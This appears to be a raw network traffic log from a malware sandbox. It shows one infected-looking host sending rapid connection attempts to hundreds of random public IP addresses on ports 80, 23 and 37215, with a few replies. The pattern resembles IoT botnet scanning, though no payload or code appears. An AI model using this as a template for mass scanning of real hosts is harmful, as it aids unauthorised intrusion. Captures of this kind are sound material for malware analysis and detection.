                                                            Jan 26, 2024 15:31:09.028239012 CET5847280192.168.2.23217.56.14.41
                                                            Jan 26, 2024 15:31:09.028239012 CET5847280192.168.2.2373.15.85.13
                                                            Jan 26, 2024 15:31:09.028239012 CET5847280192.168.2.2387.134.66.35
                                                            Jan 26, 2024 15:31:09.028239965 CET5847280192.168.2.2372.159.99.141
                                                            Jan 26, 2024 15:31:09.028249025 CET5847280192.168.2.23125.167.126.206
                                                            Jan 26, 2024 15:31:09.028251886 CET5847280192.168.2.2331.180.5.36
                                                            Jan 26, 2024 15:31:09.028251886 CET5847280192.168.2.23134.112.5.83
                                                            Jan 26, 2024 15:31:09.028251886 CET5847280192.168.2.23115.166.54.64
                                                            Jan 26, 2024 15:31:09.028254986 CET5847280192.168.2.23109.133.88.250
                                                            Jan 26, 2024 15:31:09.028261900 CET5847280192.168.2.2354.8.246.130
                                                            Jan 26, 2024 15:31:09.028264046 CET5847280192.168.2.2384.136.218.207
                                                            Jan 26, 2024 15:31:09.028268099 CET5847280192.168.2.23151.71.13.142
                                                            Jan 26, 2024 15:31:09.028268099 CET5847280192.168.2.2394.28.156.135
                                                            Jan 26, 2024 15:31:09.028268099 CET5847280192.168.2.23164.97.146.227
                                                            Jan 26, 2024 15:31:09.028268099 CET5847280192.168.2.238.145.203.205
                                                            Jan 26, 2024 15:31:09.028290033 CET5847280192.168.2.23137.209.37.249
                                                            Jan 26, 2024 15:31:09.028290033 CET5847280192.168.2.23104.107.187.130
                                                            Jan 26, 2024 15:31:09.028292894 CET5847280192.168.2.23133.201.121.67
                                                            Jan 26, 2024 15:31:09.028295994 CET5847280192.168.2.2351.220.73.246
                                                            Jan 26, 2024 15:31:09.028295994 CET5847280192.168.2.23112.150.250.158
                                                            Jan 26, 2024 15:31:09.028295994 CET5847280192.168.2.23200.253.214.134
                                                            Jan 26, 2024 15:31:09.028295994 CET5847280192.168.2.23216.56.96.3
                                                            Jan 26, 2024 15:31:09.028297901 CET5847280192.168.2.23128.200.62.143
                                                            Jan 26, 2024 15:31:09.028297901 CET5847280192.168.2.2364.245.242.99
                                                            Jan 26, 2024 15:31:09.028300047 CET5847280192.168.2.2394.7.162.68
                                                            Jan 26, 2024 15:31:09.028300047 CET5847280192.168.2.2364.101.209.239
                                                            Jan 26, 2024 15:31:09.028307915 CET5847280192.168.2.23185.52.164.10
                                                            Jan 26, 2024 15:31:09.028307915 CET5847280192.168.2.23193.201.125.146
                                                            Jan 26, 2024 15:31:09.028309107 CET5847280192.168.2.23196.137.3.141
                                                            Jan 26, 2024 15:31:09.028309107 CET5847280192.168.2.2399.17.62.42
                                                            Jan 26, 2024 15:31:09.028317928 CET5847280192.168.2.23169.101.135.92
                                                            Jan 26, 2024 15:31:09.028321981 CET5847280192.168.2.2313.148.134.192
                                                            Jan 26, 2024 15:31:09.028321981 CET5847280192.168.2.23174.10.118.160
                                                            Jan 26, 2024 15:31:09.028321981 CET5847280192.168.2.2341.175.9.213
                                                            Jan 26, 2024 15:31:09.028321981 CET5847280192.168.2.23193.74.242.122
                                                            Jan 26, 2024 15:31:09.028331041 CET5847280192.168.2.23131.203.70.140
                                                            Jan 26, 2024 15:31:09.028338909 CET5847280192.168.2.23161.47.147.6
                                                            Jan 26, 2024 15:31:09.028342009 CET5847280192.168.2.23200.68.56.203
                                                            Jan 26, 2024 15:31:09.028345108 CET5847280192.168.2.2381.79.228.251
                                                            Jan 26, 2024 15:31:09.028345108 CET5847280192.168.2.2394.108.117.238
                                                            Jan 26, 2024 15:31:09.028345108 CET5847280192.168.2.23161.187.95.241
                                                            Jan 26, 2024 15:31:09.028345108 CET5847280192.168.2.2351.114.240.123
                                                            Jan 26, 2024 15:31:09.028345108 CET5847280192.168.2.2323.113.50.53
                                                            Jan 26, 2024 15:31:09.028347015 CET5847280192.168.2.23165.105.64.36
                                                            Jan 26, 2024 15:31:09.028345108 CET5847280192.168.2.23181.101.34.97
                                                            Jan 26, 2024 15:31:09.028345108 CET5847280192.168.2.23185.241.108.20
                                                            Jan 26, 2024 15:31:09.028347015 CET5847280192.168.2.23181.232.29.1
                                                            Jan 26, 2024 15:31:09.028347015 CET5847280192.168.2.23186.69.60.20
                                                            Jan 26, 2024 15:31:09.028367043 CET5847280192.168.2.23207.165.60.81
                                                            Jan 26, 2024 15:31:09.028367043 CET5847280192.168.2.2387.102.235.32
                                                            Jan 26, 2024 15:31:09.028367043 CET5847280192.168.2.23104.19.128.95
                                                            Jan 26, 2024 15:31:09.028367043 CET5847280192.168.2.2352.141.251.193
                                                            Jan 26, 2024 15:31:09.028371096 CET5847280192.168.2.23153.109.130.155
                                                            Jan 26, 2024 15:31:09.028378963 CET5847280192.168.2.2318.18.56.147
                                                            Jan 26, 2024 15:31:09.028383017 CET5847280192.168.2.2374.28.233.15
                                                            Jan 26, 2024 15:31:09.028383970 CET5847280192.168.2.2349.107.249.254
                                                            Jan 26, 2024 15:31:09.028383970 CET5847280192.168.2.2382.247.182.219
                                                            Jan 26, 2024 15:31:09.028394938 CET5847280192.168.2.239.243.100.168
                                                            Jan 26, 2024 15:31:09.028394938 CET5847280192.168.2.23218.28.194.182
                                                            Jan 26, 2024 15:31:09.028409004 CET5847280192.168.2.23136.26.166.138
                                                            Jan 26, 2024 15:31:09.028409004 CET5847280192.168.2.2323.38.144.59
                                                            Jan 26, 2024 15:31:09.028409004 CET5847280192.168.2.23129.167.220.140
                                                            Jan 26, 2024 15:31:09.028409004 CET5847280192.168.2.235.48.175.111
                                                            Jan 26, 2024 15:31:09.028410912 CET5847280192.168.2.2364.215.205.89
                                                            Jan 26, 2024 15:31:09.028410912 CET5847280192.168.2.23130.163.84.116
                                                            Jan 26, 2024 15:31:09.028414011 CET5847280192.168.2.23126.151.235.70
                                                            Jan 26, 2024 15:31:09.028414011 CET5847280192.168.2.23103.81.165.41
                                                            Jan 26, 2024 15:31:09.028414965 CET5847280192.168.2.2348.122.174.164
                                                            Jan 26, 2024 15:31:09.028414011 CET5847280192.168.2.2381.210.113.227
                                                            Jan 26, 2024 15:31:09.028414011 CET5847280192.168.2.2331.21.177.76
                                                            Jan 26, 2024 15:31:09.028417110 CET5847280192.168.2.23203.59.150.139
                                                            Jan 26, 2024 15:31:09.028417110 CET5847280192.168.2.2386.242.24.24
                                                            Jan 26, 2024 15:31:09.028420925 CET5847280192.168.2.23118.32.75.144
                                                            Jan 26, 2024 15:31:09.028430939 CET5847280192.168.2.2344.150.219.199
                                                            Jan 26, 2024 15:31:09.028430939 CET5847280192.168.2.2398.145.86.236
                                                            Jan 26, 2024 15:31:09.028430939 CET5847280192.168.2.2376.5.36.161
                                                            Jan 26, 2024 15:31:09.028430939 CET5847280192.168.2.235.151.103.73
                                                            Jan 26, 2024 15:31:09.028430939 CET5847280192.168.2.23107.77.11.51
                                                            Jan 26, 2024 15:31:09.028434038 CET5847280192.168.2.23162.137.47.71
                                                            Jan 26, 2024 15:31:09.028434038 CET5847280192.168.2.23155.168.90.211
                                                            Jan 26, 2024 15:31:09.028434992 CET5847280192.168.2.2324.233.94.21
                                                            Jan 26, 2024 15:31:09.028435946 CET5847280192.168.2.23167.231.237.179
                                                            Jan 26, 2024 15:31:09.028435946 CET5847280192.168.2.2380.101.197.169
                                                            Jan 26, 2024 15:31:09.028435946 CET5847280192.168.2.2370.44.234.83
                                                            Jan 26, 2024 15:31:09.028445959 CET5847280192.168.2.23139.107.160.142
                                                            Jan 26, 2024 15:31:09.028450012 CET5847280192.168.2.2392.133.23.250
                                                            Jan 26, 2024 15:31:09.028450012 CET5847280192.168.2.2388.62.214.31
                                                            Jan 26, 2024 15:31:09.028450966 CET5847280192.168.2.23162.158.120.140
                                                            Jan 26, 2024 15:31:09.028450966 CET5847280192.168.2.2320.245.7.107
                                                            Jan 26, 2024 15:31:09.028453112 CET5847280192.168.2.23130.196.120.54
                                                            Jan 26, 2024 15:31:09.028453112 CET5847280192.168.2.23102.97.137.185
                                                            Jan 26, 2024 15:31:09.028453112 CET5847280192.168.2.23183.62.221.10
                                                            Jan 26, 2024 15:31:09.028456926 CET5847280192.168.2.23150.27.38.216
                                                            Jan 26, 2024 15:31:09.028458118 CET5847280192.168.2.2337.39.117.72
                                                            Jan 26, 2024 15:31:09.028461933 CET5847280192.168.2.23186.14.232.244
                                                            Jan 26, 2024 15:31:09.028467894 CET5847280192.168.2.23108.139.141.197
                                                            Jan 26, 2024 15:31:09.028479099 CET5847280192.168.2.23101.117.104.78
                                                            Jan 26, 2024 15:31:09.028482914 CET5847280192.168.2.23216.32.32.48
                                                            Jan 26, 2024 15:31:09.028486013 CET5847280192.168.2.23107.153.130.103
                                                            Jan 26, 2024 15:31:09.028501987 CET5847280192.168.2.23153.113.166.91
                                                            Jan 26, 2024 15:31:09.028508902 CET5847280192.168.2.2392.9.105.204
                                                            Jan 26, 2024 15:31:09.028508902 CET5847280192.168.2.2369.79.50.201
                                                            Jan 26, 2024 15:31:09.028511047 CET5847280192.168.2.23100.195.203.248
                                                            Jan 26, 2024 15:31:09.028511047 CET5847280192.168.2.23221.233.98.112
                                                            Jan 26, 2024 15:31:09.028512955 CET5847280192.168.2.23156.135.47.9
                                                            Jan 26, 2024 15:31:09.028512955 CET5847280192.168.2.23117.95.119.195
                                                            Jan 26, 2024 15:31:09.028512955 CET5847280192.168.2.23111.233.4.225
                                                            Jan 26, 2024 15:31:09.028512955 CET5847280192.168.2.2382.153.180.153
                                                            Jan 26, 2024 15:31:09.028517008 CET5847280192.168.2.2363.235.54.59
                                                            Jan 26, 2024 15:31:09.028518915 CET5847280192.168.2.2363.249.225.156
                                                            Jan 26, 2024 15:31:09.028525114 CET5847280192.168.2.2371.42.182.6
                                                            Jan 26, 2024 15:31:09.028531075 CET5847280192.168.2.23173.176.85.12
                                                            Jan 26, 2024 15:31:09.028531075 CET5847280192.168.2.2388.163.64.21
                                                            Jan 26, 2024 15:31:09.028531075 CET5847280192.168.2.2383.16.11.58
                                                            Jan 26, 2024 15:31:09.028536081 CET5847280192.168.2.23171.234.125.144
                                                            Jan 26, 2024 15:31:09.028538942 CET5847280192.168.2.23177.254.176.112
                                                            Jan 26, 2024 15:31:09.028542995 CET5847280192.168.2.23188.249.161.5
                                                            Jan 26, 2024 15:31:09.028549910 CET5847280192.168.2.23104.27.26.217
                                                            Jan 26, 2024 15:31:09.028552055 CET5847280192.168.2.2336.106.249.194
                                                            Jan 26, 2024 15:31:09.028553963 CET5847280192.168.2.23130.38.137.62
                                                            Jan 26, 2024 15:31:09.028554916 CET5847280192.168.2.2317.194.32.224
                                                            Jan 26, 2024 15:31:09.028563023 CET5847280192.168.2.23203.16.58.195
                                                            Jan 26, 2024 15:31:09.028563023 CET5847280192.168.2.23139.88.103.197
                                                            Jan 26, 2024 15:31:09.028564930 CET5847280192.168.2.23187.87.142.91
                                                            Jan 26, 2024 15:31:09.028564930 CET5847280192.168.2.2381.150.206.34
                                                            Jan 26, 2024 15:31:09.028564930 CET5847280192.168.2.23203.107.249.136
                                                            Jan 26, 2024 15:31:09.028578997 CET5847280192.168.2.23181.79.139.221
                                                            Jan 26, 2024 15:31:09.028578997 CET5847280192.168.2.23146.63.126.44
                                                            Jan 26, 2024 15:31:09.028583050 CET5847280192.168.2.23105.51.85.102
                                                            Jan 26, 2024 15:31:09.028583050 CET5847280192.168.2.23140.249.170.138
                                                            Jan 26, 2024 15:31:09.028583050 CET5847280192.168.2.2357.121.134.17
                                                            Jan 26, 2024 15:31:09.028584957 CET5847280192.168.2.23187.127.12.198
                                                            Jan 26, 2024 15:31:09.028584957 CET5847280192.168.2.23128.56.224.20
                                                            Jan 26, 2024 15:31:09.028584957 CET5847280192.168.2.2350.2.164.213
                                                            Jan 26, 2024 15:31:09.028593063 CET5847280192.168.2.23175.93.207.223
                                                            Jan 26, 2024 15:31:09.028609991 CET5847280192.168.2.23184.99.198.158
                                                            Jan 26, 2024 15:31:09.028609991 CET5847280192.168.2.23204.98.5.64
                                                            Jan 26, 2024 15:31:09.028615952 CET5847280192.168.2.2366.68.31.66
                                                            Jan 26, 2024 15:31:09.028615952 CET5847280192.168.2.23212.203.29.67
                                                            Jan 26, 2024 15:31:09.028620958 CET5847280192.168.2.23126.28.124.153
                                                            Jan 26, 2024 15:31:09.028621912 CET5847280192.168.2.23137.149.194.180
                                                            Jan 26, 2024 15:31:09.028621912 CET5847280192.168.2.2320.185.79.26
                                                            Jan 26, 2024 15:31:09.028630018 CET5847280192.168.2.23170.237.115.135
                                                            Jan 26, 2024 15:31:09.028634071 CET5847280192.168.2.2344.221.238.188
                                                            Jan 26, 2024 15:31:09.028634071 CET5847280192.168.2.23217.184.156.62
                                                            Jan 26, 2024 15:31:09.028635025 CET5847280192.168.2.2392.244.59.77
                                                            Jan 26, 2024 15:31:09.078780890 CET235872844.204.23.179192.168.2.23
                                                            Jan 26, 2024 15:31:09.107218981 CET2358728208.82.110.96192.168.2.23
                                                            Jan 26, 2024 15:31:09.143879890 CET805847252.87.52.72192.168.2.23
                                                            Jan 26, 2024 15:31:09.144004107 CET5847280192.168.2.2352.87.52.72
                                                            Jan 26, 2024 15:31:09.149916887 CET8058472104.27.26.217192.168.2.23
                                                            Jan 26, 2024 15:31:09.149996042 CET5847280192.168.2.23104.27.26.217
                                                            Jan 26, 2024 15:31:09.175607920 CET372155898441.207.109.0192.168.2.23
                                                            Jan 26, 2024 15:31:09.196691990 CET235872845.228.186.167192.168.2.23
                                                            Jan 26, 2024 15:31:09.221085072 CET2358728197.25.166.96192.168.2.23
                                                            Jan 26, 2024 15:31:09.221164942 CET5872823192.168.2.23197.25.166.96
                                                            Jan 26, 2024 15:31:09.247899055 CET235872860.151.219.200192.168.2.23
                                                            Jan 26, 2024 15:31:09.247936964 CET2358728222.101.208.51192.168.2.23
                                                            Jan 26, 2024 15:31:09.247973919 CET3721558984197.8.182.146192.168.2.23
                                                            Jan 26, 2024 15:31:09.256376982 CET8058472185.52.164.10192.168.2.23
                                                            Jan 26, 2024 15:31:09.256452084 CET5847280192.168.2.23185.52.164.10
                                                            Jan 26, 2024 15:31:09.259443045 CET805847223.38.144.59192.168.2.23
                                                            Jan 26, 2024 15:31:09.259511948 CET5847280192.168.2.2323.38.144.59
                                                            Jan 26, 2024 15:31:09.274084091 CET3721558984156.241.10.48192.168.2.23
                                                            Jan 26, 2024 15:31:09.274133921 CET5898437215192.168.2.23156.241.10.48
                                                            Jan 26, 2024 15:31:09.278992891 CET2358728123.140.107.115192.168.2.23
                                                            Jan 26, 2024 15:31:09.295795918 CET235872831.130.182.234192.168.2.23
                                                            Jan 26, 2024 15:31:09.322592974 CET372155898441.215.188.54192.168.2.23
                                                            Jan 26, 2024 15:31:09.330292940 CET8058472106.246.68.133192.168.2.23
                                                            Jan 26, 2024 15:31:09.331993103 CET372155898441.221.95.221192.168.2.23
                                                            Jan 26, 2024 15:31:09.333086967 CET8058472112.219.18.218192.168.2.23
                                                            Jan 26, 2024 15:31:09.342292070 CET372155898441.174.109.18192.168.2.23
                                                            Jan 26, 2024 15:31:09.356220007 CET235872827.216.242.188192.168.2.23
                                                            Jan 26, 2024 15:31:09.359117985 CET8058472128.199.89.215192.168.2.23
                                                            Jan 26, 2024 15:31:09.359195948 CET5847280192.168.2.23128.199.89.215
                                                            Jan 26, 2024 15:31:09.388406038 CET2358728111.11.128.141192.168.2.23
                                                            Jan 26, 2024 15:31:09.405059099 CET8058472197.8.52.69192.168.2.23
                                                            Jan 26, 2024 15:31:09.659674883 CET3721558984197.5.114.70192.168.2.23
                                                            Jan 26, 2024 15:31:09.960349083 CET5872823192.168.2.2323.246.130.36
                                                            Jan 26, 2024 15:31:09.960355997 CET5872823192.168.2.23222.227.233.106
                                                            Jan 26, 2024 15:31:09.960372925 CET5872823192.168.2.2378.49.153.82
                                                            Jan 26, 2024 15:31:09.960374117 CET5872823192.168.2.23181.202.240.8
                                                            Jan 26, 2024 15:31:09.960410118 CET5872823192.168.2.2359.79.145.63
                                                            Jan 26, 2024 15:31:09.960410118 CET5872823192.168.2.2399.77.124.54
                                                            Jan 26, 2024 15:31:09.960412979 CET5872823192.168.2.2327.93.93.254
                                                            Jan 26, 2024 15:31:09.960416079 CET5872823192.168.2.23117.246.1.171
                                                            Jan 26, 2024 15:31:09.960416079 CET5872823192.168.2.235.151.66.37
                                                            Jan 26, 2024 15:31:09.960443020 CET5872823192.168.2.23181.138.63.123
                                                            Jan 26, 2024 15:31:09.960447073 CET5872823192.168.2.2384.214.133.168
                                                            Jan 26, 2024 15:31:09.960448027 CET5872823192.168.2.23108.23.95.195
                                                            Jan 26, 2024 15:31:09.960455894 CET5872823192.168.2.23143.174.215.119
                                                            Jan 26, 2024 15:31:09.960459948 CET5872823192.168.2.23169.189.54.102
                                                            Jan 26, 2024 15:31:09.960477114 CET5872823192.168.2.2337.20.146.177
                                                            Jan 26, 2024 15:31:09.960477114 CET5872823192.168.2.23189.38.208.176
                                                            Jan 26, 2024 15:31:09.960477114 CET5872823192.168.2.2350.161.172.84
                                                            Jan 26, 2024 15:31:09.960491896 CET5872823192.168.2.23188.184.128.85
                                                            Jan 26, 2024 15:31:09.960494995 CET5872823192.168.2.2375.212.195.129
                                                            Jan 26, 2024 15:31:09.960495949 CET5872823192.168.2.2381.236.158.170
                                                            Jan 26, 2024 15:31:09.960521936 CET5872823192.168.2.2351.225.82.190
                                                            Jan 26, 2024 15:31:09.960522890 CET5872823192.168.2.23178.232.143.157
                                                            Jan 26, 2024 15:31:09.960522890 CET5872823192.168.2.23157.105.66.128
                                                            Jan 26, 2024 15:31:09.960522890 CET5872823192.168.2.2362.33.94.212
                                                            Jan 26, 2024 15:31:09.960530996 CET5872823192.168.2.23113.77.247.41
                                                            Jan 26, 2024 15:31:09.960531950 CET5872823192.168.2.23157.162.103.56
                                                            Jan 26, 2024 15:31:09.960532904 CET5872823192.168.2.23200.30.220.97
                                                            Jan 26, 2024 15:31:09.960541010 CET5872823192.168.2.23148.97.131.43
                                                            Jan 26, 2024 15:31:09.960544109 CET5872823192.168.2.2325.142.75.118
                                                            Jan 26, 2024 15:31:09.960544109 CET5872823192.168.2.23147.151.29.188
                                                            Jan 26, 2024 15:31:09.960556984 CET5872823192.168.2.2381.13.211.85
                                                            Jan 26, 2024 15:31:09.960561037 CET5872823192.168.2.2365.93.59.143
                                                            Jan 26, 2024 15:31:09.960572958 CET5872823192.168.2.23144.229.47.212
                                                            Jan 26, 2024 15:31:09.960582972 CET5872823192.168.2.23222.72.153.243
                                                            Jan 26, 2024 15:31:09.960583925 CET5872823192.168.2.2338.158.30.46
                                                            Jan 26, 2024 15:31:09.960587025 CET5872823192.168.2.2374.199.132.159
                                                            Jan 26, 2024 15:31:09.960596085 CET5872823192.168.2.231.56.251.158
                                                            Jan 26, 2024 15:31:09.960604906 CET5872823192.168.2.23168.100.251.148
                                                            Jan 26, 2024 15:31:09.960607052 CET5872823192.168.2.23167.228.247.238
                                                            Jan 26, 2024 15:31:09.960612059 CET5872823192.168.2.2369.47.21.20
                                                            Jan 26, 2024 15:31:09.960618973 CET5872823192.168.2.23168.88.106.71
                                                            Jan 26, 2024 15:31:09.960618973 CET5872823192.168.2.23101.98.49.42
                                                            Jan 26, 2024 15:31:09.960639000 CET5872823192.168.2.2334.27.149.247
                                                            Jan 26, 2024 15:31:09.960639954 CET5872823192.168.2.2380.165.149.47
                                                            Jan 26, 2024 15:31:09.960653067 CET5872823192.168.2.2385.193.215.144
                                                            Jan 26, 2024 15:31:09.960653067 CET5872823192.168.2.23116.244.36.189
                                                            Jan 26, 2024 15:31:09.960655928 CET5872823192.168.2.2369.114.25.215
                                                            Jan 26, 2024 15:31:09.960658073 CET5872823192.168.2.239.218.4.120
                                                            Jan 26, 2024 15:31:09.960675001 CET5872823192.168.2.23173.238.24.218
                                                            Jan 26, 2024 15:31:09.960675955 CET5872823192.168.2.2370.89.175.105
                                                            Jan 26, 2024 15:31:09.960689068 CET5872823192.168.2.23133.75.31.29
                                                            Jan 26, 2024 15:31:09.960700989 CET5872823192.168.2.2377.210.10.234
                                                            Jan 26, 2024 15:31:09.960711002 CET5872823192.168.2.23126.239.12.9
                                                            Jan 26, 2024 15:31:09.960725069 CET5872823192.168.2.23180.9.202.26
                                                            Jan 26, 2024 15:31:09.960726023 CET5872823192.168.2.23188.121.154.17
                                                            Jan 26, 2024 15:31:09.960726976 CET5872823192.168.2.2313.1.253.113
                                                            Jan 26, 2024 15:31:09.960726023 CET5872823192.168.2.23167.204.95.41
                                                            Jan 26, 2024 15:31:09.960737944 CET5872823192.168.2.2358.45.160.49
                                                            Jan 26, 2024 15:31:09.960753918 CET5872823192.168.2.23163.35.12.204
                                                            Jan 26, 2024 15:31:09.960761070 CET5872823192.168.2.23115.22.161.24
                                                            Jan 26, 2024 15:31:09.960773945 CET5872823192.168.2.2323.37.143.71
                                                            Jan 26, 2024 15:31:09.960773945 CET5872823192.168.2.2317.70.233.239
                                                            Jan 26, 2024 15:31:09.960774899 CET5872823192.168.2.23209.154.216.225
                                                            Jan 26, 2024 15:31:09.960777044 CET5872823192.168.2.23140.40.201.173
                                                            Jan 26, 2024 15:31:09.960783005 CET5872823192.168.2.23157.229.10.232
                                                            Jan 26, 2024 15:31:09.960783005 CET5872823192.168.2.23116.10.86.236
                                                            Jan 26, 2024 15:31:09.960807085 CET5872823192.168.2.2334.64.83.77
                                                            Jan 26, 2024 15:31:09.960807085 CET5872823192.168.2.23186.162.206.59
                                                            Jan 26, 2024 15:31:09.960807085 CET5872823192.168.2.2337.216.130.220
                                                            Jan 26, 2024 15:31:09.960813046 CET5872823192.168.2.23114.47.43.145
                                                            Jan 26, 2024 15:31:09.960827112 CET5872823192.168.2.2319.255.238.211
                                                            Jan 26, 2024 15:31:09.960827112 CET5872823192.168.2.2386.88.68.48
                                                            Jan 26, 2024 15:31:09.960850000 CET5872823192.168.2.23148.76.121.158
                                                            Jan 26, 2024 15:31:09.960850954 CET5872823192.168.2.23207.156.80.249
                                                            Jan 26, 2024 15:31:09.960866928 CET5872823192.168.2.2365.130.130.168
                                                            Jan 26, 2024 15:31:09.960866928 CET5872823192.168.2.23174.56.49.143
                                                            Jan 26, 2024 15:31:09.960869074 CET5872823192.168.2.23210.161.231.179
                                                            Jan 26, 2024 15:31:09.960872889 CET5872823192.168.2.2340.59.41.207
                                                            Jan 26, 2024 15:31:09.960876942 CET5872823192.168.2.2372.244.20.148
                                                            Jan 26, 2024 15:31:09.960882902 CET5872823192.168.2.23205.211.5.36
                                                            Jan 26, 2024 15:31:09.960891962 CET5872823192.168.2.23105.63.175.107
                                                            Jan 26, 2024 15:31:09.960900068 CET5872823192.168.2.23143.99.11.248
                                                            Jan 26, 2024 15:31:09.960915089 CET5872823192.168.2.23219.47.191.202
                                                            Jan 26, 2024 15:31:09.960915089 CET5872823192.168.2.23137.2.237.112
                                                            Jan 26, 2024 15:31:09.960915089 CET5872823192.168.2.2390.71.157.243
                                                            Jan 26, 2024 15:31:09.960937977 CET5872823192.168.2.23142.228.123.3
                                                            Jan 26, 2024 15:31:09.960938931 CET5872823192.168.2.2341.180.92.161
                                                            Jan 26, 2024 15:31:09.960937977 CET5872823192.168.2.23182.112.113.245
                                                            Jan 26, 2024 15:31:09.960952997 CET5872823192.168.2.23123.17.37.163
                                                            Jan 26, 2024 15:31:09.960956097 CET5872823192.168.2.23183.32.94.140
                                                            Jan 26, 2024 15:31:09.960957050 CET5872823192.168.2.235.128.74.219
                                                            Jan 26, 2024 15:31:09.960968971 CET5872823192.168.2.2367.93.130.0
                                                            Jan 26, 2024 15:31:09.960982084 CET5872823192.168.2.23175.203.248.98
                                                            Jan 26, 2024 15:31:09.960984945 CET5872823192.168.2.23102.8.203.194
                                                            Jan 26, 2024 15:31:09.960984945 CET5872823192.168.2.232.21.51.41
                                                            Jan 26, 2024 15:31:09.960992098 CET5872823192.168.2.23115.232.146.234
                                                            Jan 26, 2024 15:31:09.960995913 CET5872823192.168.2.2397.32.237.73
                                                            Jan 26, 2024 15:31:09.961002111 CET5872823192.168.2.23122.140.134.172
                                                            Jan 26, 2024 15:31:09.961025000 CET5872823192.168.2.2373.11.152.252
                                                            Jan 26, 2024 15:31:09.961026907 CET5872823192.168.2.2363.111.54.241
                                                            Jan 26, 2024 15:31:09.961028099 CET5872823192.168.2.23172.140.187.118
                                                            Jan 26, 2024 15:31:09.961028099 CET5872823192.168.2.2378.49.120.125
                                                            Jan 26, 2024 15:31:09.961039066 CET5872823192.168.2.2323.134.96.90
                                                            Jan 26, 2024 15:31:09.961042881 CET5872823192.168.2.23141.174.20.146
                                                            Jan 26, 2024 15:31:09.961045980 CET5872823192.168.2.2370.115.237.91
                                                            Jan 26, 2024 15:31:09.961052895 CET5872823192.168.2.23207.255.56.80
                                                            Jan 26, 2024 15:31:09.961060047 CET5872823192.168.2.2362.64.111.125
                                                            Jan 26, 2024 15:31:09.961075068 CET5872823192.168.2.23185.219.231.247
                                                            Jan 26, 2024 15:31:09.961075068 CET5872823192.168.2.23124.253.145.42
                                                            Jan 26, 2024 15:31:09.961086988 CET5872823192.168.2.2337.76.144.15
                                                            Jan 26, 2024 15:31:09.961091042 CET5872823192.168.2.23223.175.116.73
                                                            Jan 26, 2024 15:31:09.961091995 CET5872823192.168.2.23130.190.184.118
                                                            Jan 26, 2024 15:31:09.961103916 CET5872823192.168.2.23168.201.100.23
                                                            Jan 26, 2024 15:31:09.961103916 CET5872823192.168.2.235.173.1.3
                                                            Jan 26, 2024 15:31:09.961108923 CET5872823192.168.2.2320.219.29.81
                                                            Jan 26, 2024 15:31:09.961122036 CET5872823192.168.2.23220.97.238.167
                                                            Jan 26, 2024 15:31:09.961124897 CET5872823192.168.2.23189.0.48.150
                                                            Jan 26, 2024 15:31:09.961127043 CET5872823192.168.2.23139.158.29.226
                                                            Jan 26, 2024 15:31:09.961141109 CET5872823192.168.2.2357.46.152.188
                                                            Jan 26, 2024 15:31:09.961142063 CET5872823192.168.2.2376.211.203.252
                                                            Jan 26, 2024 15:31:09.961143017 CET5872823192.168.2.23189.86.249.203
                                                            Jan 26, 2024 15:31:09.961155891 CET5872823192.168.2.2375.141.132.180
                                                            Jan 26, 2024 15:31:09.961158991 CET5872823192.168.2.232.14.67.137
                                                            Jan 26, 2024 15:31:09.961184025 CET5872823192.168.2.23179.99.134.58
                                                            Jan 26, 2024 15:31:09.961184025 CET5872823192.168.2.2357.120.169.5
                                                            Jan 26, 2024 15:31:09.961185932 CET5872823192.168.2.2319.214.211.219
                                                            Jan 26, 2024 15:31:09.961193085 CET5872823192.168.2.2367.77.69.231
                                                            Jan 26, 2024 15:31:09.961193085 CET5872823192.168.2.23189.94.50.91
                                                            Jan 26, 2024 15:31:09.961210012 CET5872823192.168.2.23155.139.99.81
                                                            Jan 26, 2024 15:31:09.961210012 CET5872823192.168.2.23111.53.146.41
                                                            Jan 26, 2024 15:31:09.961210966 CET5872823192.168.2.23188.91.113.159
                                                            Jan 26, 2024 15:31:09.961230040 CET5872823192.168.2.23128.246.38.108
                                                            Jan 26, 2024 15:31:09.961231947 CET5872823192.168.2.2389.60.177.46
                                                            Jan 26, 2024 15:31:09.961231947 CET5872823192.168.2.2341.159.129.37
                                                            Jan 26, 2024 15:31:09.961239100 CET5872823192.168.2.2317.157.10.244
                                                            Jan 26, 2024 15:31:09.961241961 CET5872823192.168.2.23150.195.124.154
                                                            Jan 26, 2024 15:31:09.961253881 CET5872823192.168.2.23113.90.200.44
                                                            Jan 26, 2024 15:31:09.961256981 CET5872823192.168.2.23114.9.200.175
                                                            Jan 26, 2024 15:31:09.961256981 CET5872823192.168.2.2349.17.229.7
                                                            Jan 26, 2024 15:31:09.961271048 CET5872823192.168.2.23179.113.87.112
                                                            Jan 26, 2024 15:31:09.961277008 CET5872823192.168.2.23172.220.48.4
                                                            Jan 26, 2024 15:31:09.961282015 CET5872823192.168.2.2339.76.111.247
                                                            Jan 26, 2024 15:31:09.961282969 CET5872823192.168.2.23182.30.133.77
                                                            Jan 26, 2024 15:31:09.961301088 CET5872823192.168.2.23131.21.58.156
                                                            Jan 26, 2024 15:31:09.961302042 CET5872823192.168.2.23108.96.148.141
                                                            Jan 26, 2024 15:31:09.961308956 CET5872823192.168.2.2312.53.28.65
                                                            Jan 26, 2024 15:31:09.961317062 CET5872823192.168.2.2359.215.80.200
                                                            Jan 26, 2024 15:31:09.961333036 CET5872823192.168.2.23159.5.28.240
                                                            Jan 26, 2024 15:31:09.961333990 CET5872823192.168.2.2320.170.229.134
                                                            Jan 26, 2024 15:31:09.961334944 CET5872823192.168.2.23120.186.205.247
                                                            Jan 26, 2024 15:31:09.961334944 CET5872823192.168.2.2362.114.101.170
                                                            Jan 26, 2024 15:31:09.961344957 CET5872823192.168.2.23210.185.246.209
                                                            Jan 26, 2024 15:31:09.961353064 CET5872823192.168.2.2396.61.141.29
                                                            Jan 26, 2024 15:31:09.961353064 CET5872823192.168.2.23202.28.228.152
                                                            Jan 26, 2024 15:31:09.961353064 CET5872823192.168.2.2357.201.204.178
                                                            Jan 26, 2024 15:31:09.961355925 CET5872823192.168.2.23159.246.52.67
                                                            Jan 26, 2024 15:31:09.961370945 CET5872823192.168.2.23107.184.14.84
                                                            Jan 26, 2024 15:31:09.961375952 CET5872823192.168.2.23166.160.192.254
                                                            Jan 26, 2024 15:31:09.961375952 CET5872823192.168.2.2317.88.136.148
                                                            Jan 26, 2024 15:31:09.961385965 CET5872823192.168.2.23207.21.168.166
                                                            Jan 26, 2024 15:31:09.961393118 CET5872823192.168.2.23131.27.183.230
                                                            Jan 26, 2024 15:31:09.961399078 CET5872823192.168.2.23104.107.62.205
                                                            Jan 26, 2024 15:31:09.961402893 CET5872823192.168.2.23119.133.189.196
